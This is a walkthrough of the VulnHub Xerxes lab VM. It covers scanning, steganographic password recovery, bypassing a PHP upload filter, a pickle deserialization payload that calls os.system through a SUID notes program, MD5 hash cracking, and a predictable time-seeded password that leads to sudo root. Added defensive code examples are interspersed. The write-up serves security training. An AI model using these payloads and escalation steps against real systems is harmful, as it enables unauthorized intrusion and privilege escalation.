You can download it here: https://www.vulnhub.com/entry/xerxes-1,58/

Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-18 12:10 EDT
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:10
Completed NSE at 12:10, 0.00s elapsed
Initiating NSE at 12:10
Completed NSE at 12:10, 0.00s elapsed
Initiating ARP Ping Scan at 12:10
Scanning 192.168.227.178 [1 port]
Completed ARP Ping Scan at 12:10, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 12:10
Completed Parallel DNS resolution of 1 host. at 12:10, 0.00s elapsed
Initiating SYN Stealth Scan at 12:10
Scanning 192.168.227.178 [65535 ports]
Discovered open port 22/tcp on 192.168.227.178
Discovered open port 80/tcp on 192.168.227.178
Completed SYN Stealth Scan at 12:10, 2.50s elapsed (65535 total ports)
Initiating Service scan at 12:10
Scanning 2 services on 192.168.227.178
Completed Service scan at 12:10, 6.01s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 192.168.227.178
NSE: Script scanning 192.168.227.178.
Initiating NSE at 12:10
Completed NSE at 12:10, 0.20s elapsed
Initiating NSE at 12:10
Completed NSE at 12:10, 0.00s elapsed
Nmap scan report for 192.168.227.178
Host is up (0.00072s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4 (protocol 2.0)
| ssh-hostkey:
| 1024 78:63:e9:43:33:d3:80:0e:b2:83:15:26:fc:41:ea:17 (DSA)
| 2048 48:69:ae:38:d5:a1:05:e2:f5:22:45:49:35:b0:ca:5c (RSA)
|_ 256 14:3c:81:fb:32:dd:70:70:05:63:1a:d2:8e:ef:32:64 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 2 disallowed entries
|_/ /dev
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:40:51:66 (VMware)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Uptime guess: 0.284 days (since Tue Jun 18 05:21:38 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.72 ms 192.168.227.178

NSE: Script Post-scanning.
Initiating NSE at 12:10
Completed NSE at 12:10, 0.00s elapsed
Initiating NSE at 12:10
Completed NSE at 12:10, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.22 seconds
Raw packets sent: 65558 (2.885MB) | Rcvd: 65550 (2.623MB)

Look at port 80

It looks like a file-upload component, but it requires a password, and brute-forcing it got nowhere. The "forgot password" link serves a QR code, which decodes to "dig deeper". Could there be something hidden in the image? Loading it into stegsolve reveals content in the top-left corner of the alpha channel.

That looks like base64; decoding it yields brainfuck code, and running that yields the password 45100.

The upload component has a filter, but it is easy to get past: uploading a file named php.php is enough.

Reading the upload component's code:

<?php

$password = $_POST["password"];
$disallowedExts = array("php", "html");

$ok = 1;
foreach ($disallowedExts as &$ext) {
    // strpos() returns the match offset, or false when the needle is absent;
    // there is no === check, so an offset of 0 is treated like "not found"
    if (strpos($_FILES["upload_file"]["name"], $ext))
    {
        echo "Error: illegal file detected.<br>";
        $ok = 0;
    }
}

strpos($_FILES["upload_file"]["name"], $ext) returns the position of the first occurrence of $ext in the file name, or false if it is absent. For php.php, "php" occurs at the very beginning, so strpos returns 0; because the comparison is not strict (no ===), 0 is treated like false and the check passes. The blacklist itself is also easy to get around: upload a .pht file, or use an .htaccess file to get arbitrary extensions parsed as PHP.
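As an added example (not code from the original post), the filter's logic mirrored in Python with strpos() emulated, beside a hardened check that allow-lists only the final extension; the ALLOWED set is an assumption for the illustration:

```python
# Added example (not from the original post): the PHP filter's bug mirrored in
# Python with strpos() emulated, beside a hardened extension check.
import os

DISALLOWED = ("php", "html")             # the post's blacklist
ALLOWED = {"png", "jpg", "jpeg", "gif"}  # assumed allow-list for the fixed version


def strpos(haystack, needle):
    """PHP strpos(): offset of the first match, or False when absent."""
    pos = haystack.find(needle)
    return False if pos == -1 else pos


def flawed_check(filename):
    """Same logic as the PHP loop. `if strpos(...)` treats offset 0 exactly
    like False, so a name that *starts* with 'php' passes; a name whose
    extension is simply not on the blacklist (pht, PHP) passes too."""
    for ext in DISALLOWED:
        if strpos(filename, ext):
            return False        # "Error: illegal file detected."
    return True


def hardened_check(filename):
    """Allow-list the final extension of the bare file name, case-folded."""
    base = os.path.basename(filename)
    if base.startswith(".") or base.count(".") != 1:
        return False            # rejects .htaccess and double-extension names
    name, _, ext = base.partition(".")
    return bool(name) and ext.lower() in ALLOWED
```

Even with the hardened check, the upload directory should have script execution disabled server-side, so that a filter mistake cannot become code execution.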

Reverse shell

Look for users whose shell is /bin/bash

cat /etc/passwd | grep /bin/bash
root:x:0:0:root:/root:/bin/bash
amanpour:x:1001:1001:Taz Amanpour,,,:/home/amanpour:/bin/bash
curtiz:x:1002:1002:Juan Curtiz,,,:/home/curtiz:/bin/bash

Find executables with the SUID bit set

find / -perm -u=s -type f 2>/dev/null
/opt/notes
/usr/lib/eject/dmcrypt-get-device
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/sbin/exim4
/usr/bin/procmail
/usr/bin/passwd
/usr/bin/at
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/sudoedit
/bin/umount
/bin/su
/bin/ping6
/bin/mount
/bin/ping

This /opt/notes looks suspicious; take a closer look

cd /opt
ls -al
total 20
drwxr-xr-x 2 root root 4096 Dec 18 2013 .
drwxr-xr-x 22 root root 4096 Dec 17 2013 ..
-rwsr-s--x 1 curtiz notes 5111 Dec 18 2013 notes
-rwxr-x--- 1 curtiz notes 1343 Dec 19 2013 notes.py
file notes
notes: setuid setgid executable, regular file, no read permission

notes.py is presumably the source of notes: notes was compiled into an executable and given the SUID bit, with curtiz as owner, so the intended route is probably to use notes to get a shell as curtiz. Our current permissions, however, are not enough to read the notes.py source. Move on to the home directories.

www-data@xerxes:/home/amanpour$ ls
ls
lostpassword.png newpassword qr steqr.py
www-data@xerxes:/home/amanpour$ ls -al
ls -al
total 44
drwxr-xr-x 3 amanpour amanpour 4096 Dec 19 2013 .
drwxr-xr-x 5 root root 4096 Dec 17 2013 ..
-rwxr--r-- 1 amanpour amanpour 312 Jun 18 14:53 .bash_history
-rw-r--r-- 1 amanpour amanpour 220 Dec 17 2013 .bash_logout
-rw-r--r-- 1 amanpour amanpour 3433 Dec 19 2013 .bashrc
-rw-r--r-- 1 amanpour amanpour 675 Dec 17 2013 .profile
drwx------ 2 amanpour amanpour 4096 Dec 19 2013 .ssh
-rw-r--r-- 1 amanpour amanpour 1240 Dec 18 2013 lostpassword.png
-rw-r--r-- 1 amanpour amanpour 1220 Dec 18 2013 newpassword
-rw-r--r-- 1 amanpour amanpour 1071 Dec 17 2013 qr
-rw-r--r-- 1 amanpour amanpour 1235 Dec 18 2013 steqr.py
www-data@xerxes:/home/amanpour$ cat .bash_history
cat .bash_history
file qr
python steqr.py -f qr -s hehehehe
python steqr.py -f qr-enc.png
python steqr.py -f qr -s "KysrKysrWz4rKysrKysrKzwtXT4rKysrLisuLS0tLS4tLi4="
mv qr-enc.png lostpassword.png
python steqr.py -f lostpassword.png | base64 -d
python steqr.py -f newpassword
passwd
exit
whoami
exit
whoami
whoami
cd /opt
ls
exit

Notice that amanpour ran passwd immediately after python steqr.py -f newpassword, so presumably the output of python steqr.py -f newpassword was used as the new password.

www-data@xerxes:/home/amanpour$ python steqr.py -f newpassword
python steqr.py -f newpassword
b56d9d8b6077fb56127d1c8ff84ece11
www-data@xerxes:/home/amanpour$ su amanpour
su amanpour
Password: b56d9d8b6077fb56127d1c8ff84ece11

amanpour@xerxes:~$ id
id
uid=1001(amanpour) gid=1001(amanpour) groups=1001(amanpour),1003(notes)

Now we have permission to read notes.py; go back to /opt and read its source.

#!/usr/bin/python

import pickle

notes = []

def save(filename):
    if len(filename) < 1:
        filename = "notes"
    f = open("/home/curtiz/" + filename, "wb")
    pickle.dump(notes, f)
    f.close()
    return 0

def load(filename):
    if len(filename) < 1:
        filename = "notes"
    # the path is user-controlled (no check for "..") and pickle.load()
    # will call any callable the file names
    f = open("/home/curtiz/" + filename, "rb")
    notes = pickle.load(f)
    f.close()
    return notes

def main():
    global notes
    print ""
    print "-------------------------------"
    print " Welcome to Juan's to-do list! "
    print " type help for more info "
    print "-------------------------------"

    while True:
        raw_cmd = raw_input()
        cmd = raw_cmd.split()
        if (len(cmd) > 0):
            if "help" == cmd[0]:
                print " Available commands:"
                print " - add [note] : add a note for Juan"
                print " - show : show to-do list"
                print " - save [file] : save to-do list"
                print " - load [file] : load to-do list"
                print " - quit : exit"
                print ""

            if "add" == cmd[0]:
                #print "add"
                notes.append(" - " + raw_cmd[4:])

            if "save" == cmd[0]:
                #print "save"
                save(raw_cmd[5:])

            if "load" == cmd[0]:
                #print "load"
                notes = load(raw_cmd[5:])

            if "show" == cmd[0]:
                #print "show"
                for note in notes:
                    print note

            if "quit" == cmd[0] or "exit" == cmd[0]:
                return 0
    return 0

if __name__ == "__main__":
    main()

Note that it calls the pickle module's load method on a file whose name we choose; I recall that this deserialization routine can be made to execute arbitrary commands.

import cPickle
import os

class genpoc(object):
    # __reduce__ tells pickle how to rebuild the object on load:
    # here, by calling os.system("whoami")
    def __reduce__(self):
        s = """whoami"""
        return os.system, (s,)

e = genpoc()
poc = cPickle.dumps(e)

print poc
amanpour@xerxes:/opt$ python /tmp/test.py > /tmp/poc
python /tmp/test.py > /tmp/poc
amanpour@xerxes:/opt$ ./notes
./notes

-------------------------------
Welcome to Juan's to-do list!
type help for more info
-------------------------------
load ../../tmp/poc
load ../../tmp/poc
curtiz
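For the defensive side of the same mechanism, here is an added example (not code from the original post or the VM) of how load() in a program like notes.py could refuse such a file: pickle's find_class() hook resolves every global reference, and a to-do list never legitimately needs one, so it can reject them all. CallsOnLoad and the sample notes are constructed for the illustration and use a harmless callable.

```python
# Added example (not from the original post): a load() for the notes program
# that refuses pickles carrying callables. Only a list of strings is a valid
# to-do list, so find_class() can reject every global reference outright.
import io
import os
import pickle


class NotesUnpickler(pickle.Unpickler):
    """find_class() is pickle's hook for GLOBAL/STACK_GLOBAL opcodes; the stock
    Unpickler returns the named object, which is how os.system gets invoked."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(
            "refusing to resolve %s.%s in a notes file" % (module, name))


def safe_load(data):
    """Load a to-do list, rejecting anything that is not a list of str."""
    notes = NotesUnpickler(io.BytesIO(data)).load()
    if not isinstance(notes, list) or not all(isinstance(n, str) for n in notes):
        raise ValueError("notes file does not contain a list of strings")
    return notes


class CallsOnLoad(object):
    """Constructed marker: __reduce__ makes the pickle call os.getcwd on load,
    the same mechanism as the post's payload, with a harmless callable."""

    def __reduce__(self):
        return (os.getcwd, ())


def demo():
    """Returns (notes loaded from a benign file, whether the bad one was blocked)."""
    good = pickle.dumps([" - buy milk", " - call Marie"])   # constructed sample
    bad = pickle.dumps(CallsOnLoad())
    assert pickle.loads(bad) == os.getcwd()   # stock loader runs the callable
    try:
        safe_load(bad)
        blocked = False
    except pickle.UnpicklingError:
        blocked = True
    return safe_load(good), blocked
```

For a SUID program like notes, storing the list as JSON would be simpler still, since JSON cannot encode callables at all.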

whoami ran successfully as curtiz. Changing whoami to /bin/sh gives a shell as curtiz.

amanpour@xerxes:/opt$ python /tmp/test.py > /tmp/poc
python /tmp/test.py > /tmp/poc
amanpour@xerxes:/opt$ ./notes
./notes

-------------------------------
Welcome to Juan's to-do list!
type help for more info
-------------------------------
load ../../tmp/poc
load ../../tmp/poc
$ whoami
whoami
curtiz
$ cd /home/curtiz
cd /home/curtiz
$ ls
ls
id_rsa notes notes.bak
$ cat notes
cat notes
(lp0
S" - I've found Marie's keyfile and was able to login via ssh,"
p1
aS' - but it seems she has added another layer of protection...'
p2
a.
$ cat /etc/passwd | grep Marie
cat /etc/passwd | grep Marie
delacroix:x:1000:1000:Marie Delacroix,,,:/home/delacroix:/bin/delacroix


id_rsa should be delacroix's SSH private key. Downloading it and trying to log in, a password is still required. Looking closer, delacroix's shell is /bin/delacroix; download that binary and analyze it in IDA Pro.

That makes it clear: the password the user types is MD5-hashed and compared with 3d054afb77714ca938d8bca104fcb141. Looking up that hash directly gives VonBraun.

Log in to delacroix's SSH account

root@kali:~# ssh -i id_rsa delacroix@192.168.227.178
Linux xerxes 3.2.0-4-486 #1 Debian 3.2.51-1 i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jun 18 12:07:35 2019 from 192.168.227.160
Password: VonBraun
XERXES checking security...
Your password has expired. Please generate a new one.
XERXES wishes you
a nice day
delacroix@xerxes:/home/delacroix$ whoami
delacroix
delacroix@xerxes:/home/delacroix$ id
uid=1000(delacroix) gid=1000(delacroix) groups=1000(delacroix),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev)
delacroix@xerxes:/home/delacroix$ ls
check.sh generate.sh
delacroix@xerxes:/home/delacroix$ history
1 whoami
2 id
3 sudo su
4 exit
5 ./generate.sh
6 passwd
7 sudo su
8 exit
9 ssh-keygen -t rsa
10 cd .ssh
11 ls -alh
12 cat id_rsa.pub > authorized_keys
13 ls -alh
14 chmod 700 authorized_keys
15 ls -alh
16 exit

Note that delacroix ran passwd right after ./generate.sh, which suggests the previous password was the output of ./generate.sh. Read generate.sh:

delacroix@xerxes:/home/delacroix$ cat generate.sh
#!/bin/sh
touch .last && p=$(date | awk '{print $4}' | md5sum | awk '{print $1}')
echo "XERXES has generated a new password: $p"
echo " XERXES is forever"
echo " at your service"

It first creates the empty file .last, then takes the current date and time, uses awk to pick out the time field, and MD5-hashes it. The creation time of .last is therefore the seed of delacroix's password.
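As an added example (not code from the original post or the VM), the derivation generate.sh performs, reproduced in Python so the size of the resulting password space can be measured, next to the CSPRNG-based generator a defender would use instead; audit_demo() builds a constructed .last file in a temp directory:

```python
# Added example (not from the original post): the password space generate.sh
# produces. The script hashes only the HH:MM:SS field of `date`, so there are
# at most 86400 distinct passwords, all recoverable from the mtime of .last.
import hashlib
import os
import secrets
import tempfile
import time


def generate_sh_password(hhmmss):
    """Reproduce `date | awk '{print $4}' | md5sum | awk '{print $1}'`.
    awk prints the field with a trailing newline, which md5sum includes."""
    return hashlib.md5((hhmmss + "\n").encode()).hexdigest()


def candidate_space():
    """Every password generate.sh can ever emit, keyed by time of day."""
    times = ["%02d:%02d:%02d" % (h, m, s)
             for h in range(24) for m in range(60) for s in range(60)]
    return {t: generate_sh_password(t) for t in times}


def password_from_last_file(path):
    """What an auditor sees on the box: .last's mtime pins the seed."""
    hhmmss = time.strftime("%H:%M:%S", time.localtime(os.path.getmtime(path)))
    return generate_sh_password(hhmmss)


def strong_password(nbytes=16):
    """Replacement a defender would ship: CSPRNG output, not time of day."""
    return secrets.token_urlsafe(nbytes)


def audit_demo():
    """Constructed check: a .last file whose mtime is 00:19:51 local time
    yields exactly the password the script generated at that moment."""
    stamp = time.mktime(time.strptime("2019-06-18 00:19:51", "%Y-%m-%d %H:%M:%S"))
    with tempfile.NamedTemporaryFile(prefix=".last", delete=False) as f:
        path = f.name
    os.utime(path, (stamp, stamp))
    recovered = password_from_last_file(path)
    os.remove(path)
    return recovered == generate_sh_password("00:19:51")
```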

delacroix@xerxes:/home/delacroix$ echo "00:19:51" |md5sum           
6cf49e97c915079e27c09d41da9d95e4 -
delacroix@xerxes:/home/delacroix$ sudo -l
Matching Defaults entries for delacroix on this host:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User delacroix may run the following commands on this host:
(ALL : ALL) ALL
delacroix@xerxes:/home/delacroix$ sudo su
root@xerxes:/home/delacroix#